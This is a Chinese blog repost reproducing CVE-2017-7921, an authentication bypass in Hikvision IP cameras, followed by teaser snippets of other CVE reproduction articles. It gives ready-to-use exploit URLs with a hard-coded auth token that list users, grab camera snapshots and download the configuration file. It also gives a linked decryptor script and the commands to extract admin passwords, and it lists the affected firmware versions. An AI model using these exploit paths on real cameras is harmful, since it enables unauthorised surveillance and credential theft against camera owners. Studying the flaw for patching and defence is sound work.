CVE-2017-7921漏洞复现

9月前作者：order by 分类：Toy博客阅读(43) 违法举报

这篇具有很好参考价值的文章主要介绍了CVE-2017-7921漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

漏洞描述

0x01 CVE-2017-7921漏洞复现

许多HikvisionIP摄像机包含一个后门，允许未经身份验证的模拟任何配置的用户帐户。
cve-2017-7921,安全
0x02 漏洞复现：

利用工具发现漏洞（CVE-2017-7921）：
cve-2017-7921,安全
利用路径：/Security/users?auth=YWRtaW46MTEK

附：检索所有用户及其角色的列表
cve-2017-7921,安全利用路径：/onvif-http/snapshot?auth=YWRtaW46MTEK

附：获取相机快照而不进行身份验证
cve-2017-7921,安全利用路径：

/System/configurationFile?auth=YWRtaW46MTEK

附：下载摄像头配置账号密码文件

cve-2017-7921,安全 0x03 漏洞影响版本：

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

版本至5.4.0build160530版本；

DS-2CD2xx0F-ISeries5.2.0build140721

版本至5.4.0Build160401版本；

DS-2CD2xx2FWDSeries5.3.1build150410

版本至5.4.4Build161125版本；

DS-2CD4x2xFWDSeries5.2.0build140721

版本至5.4.0Build160414版本；

DS-2CD4xx5Series5.2.0build140721

版本至5.4.0Build160421版本；

DS-2DFxSeries5.2.0build140805

版本至5.4.5Build160928版本；

DS-2CD63xxSeries5.0.9build140305

版本至5.3.5Build160106版本

解密二进制文件（configurationFile）

1、脚本下载：

脚本链接：https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

2、脚本使用方法：

依赖库：pycryptodome
依赖库安装：python -m pip install pycryptodome
因为我的电脑安装了两个版本的python，所以使用py -3
解密命令：
python decrypt_configurationFile.py configurationFile
红框中的就是后台登陆的账号密码

cve-2017-7921,安全文章来源地址https://www.toymoban.com/news/detail-531077.html

到了这里，关于CVE-2017-7921漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

django/CVE-2017-12794XSS漏洞复现

docker搭建漏洞复现环境漏洞原理看帮助文档 http://your-ip:8000/create_user/?username=scriptalert(1)/script`创建一个用户，成功；再次访问`http://your-ip:8000/create_user/?username=scriptalert(1)/script`，触发异常：因为被kali的浏览器拦截了，用本机的浏览器实验

2024年02月10日
浏览(36)
Apache HTTPD （CVE-2017-15715）换行解析漏洞复现

组件版本漏洞名称 Apache HTTPD 换行解析漏洞（CVE-2017-15715）漏洞描述 Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞，在解析PHP时， 1.phpx0A 将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略。原理 apache-CVE-2017-1

2024年02月09日
浏览(40)
【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715)

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规说明内容漏洞编号 CVE-2017-15715 漏洞名称 Apache HTTPD 换行解析漏洞漏洞评级高危影响范围 2.4.0~2.4.29 漏洞描述在解析PHP时， 1.phpx0A 将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略修复方案

2024年02月05日
浏览(48)
【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规说明内容漏洞编号 CVE-2017-12794 漏洞名称 Django_debug page_XSS漏洞漏洞评级影响范围 1.11.5版本漏洞描述修复方案 1.1、漏洞描述 1.11.5版本，修复了500页面中存在的一个XSS漏洞 1.2、漏洞等级 1.3、影响版本

2024年02月05日
浏览(40)
Apache Struts2 S2-045远程命令执行漏洞（CVE-2017-5638）复现

Apache Struts2是Apache项目下的一个web 框架，帮助Java开发者利用J2EE来开发Web相关应用。 Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞，攻击者可以在使用该插件上传文件时，修改HTTP请求头中的Content-Type值来触发该漏洞，导致远程执行代码。 Struts 2.3.5 – Struts 2.3.3

2024年02月15日
浏览(45)
【漏洞复现】Apache_Tomcat_PUT方法任意写文件(CVE-2017-12615)

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规说明内容漏洞编号 CVE-2017-12615 漏洞名称 Tomcat_PUT方法任意写文件漏洞评级高危影响范围 Tomcat版本：8.5.19 漏洞描述漏洞本质Tomcat配置了可写（readonly=false），导致我们可以往服务器写文件修复方案

2024年02月05日
浏览(37)
【漏洞复现】Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规说明内容漏洞编号 CVE-2017-5645 漏洞名称 Log4j Server 反序列化命令执行漏洞漏洞评级高危影响范围 Apache Log4j 2.8.2之前的2.x版本漏洞描述修复方案 1.1、漏洞描述攻击者可以通过发送一个特别制作的2进

2024年02月05日
浏览(63)
Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）（漏洞复现详细过程）

目录一、漏洞介绍二、漏洞环境搭建三、漏洞利用四、漏洞流量特征： CVE-2017-5645 是 Apache Log4j 服务器的一个反序列化命令执行漏洞，攻击者可以利用这个漏洞通过发送精心制作的请求，远程执行命令，从而危及服务器的安全。进入漏洞目录文件，启动漏洞环境：docker-c

2024年02月16日
浏览(51)
【网络安全】CVE漏洞分析以及复现

漏洞详情 Shiro 在路径控制的时候，未能对传入的 url 编码进行 decode 解码，导致攻击者可以绕过过滤器，访问被过滤的路径。漏洞影响版本 Shiro 1.0.0-incubating 对应 Maven Repo 里面也有【一一帮助安全学习，所有资源获取一一】 ①网络安全学习路线 ②20份渗透测试电子书 ③安全

2024年02月06日
浏览(48)
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程（特详细）

分享一个非常详细的网络安全笔记，是我学习网安过程中用心写的，可以点开以下链接获取：超详细的网络安全笔记 Apache Tomcat文件包含漏洞（CNVD-2020-10487/CVE-2020-1938）。该漏洞是由于Tomcat AJP协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的

2024年02月08日
浏览(53)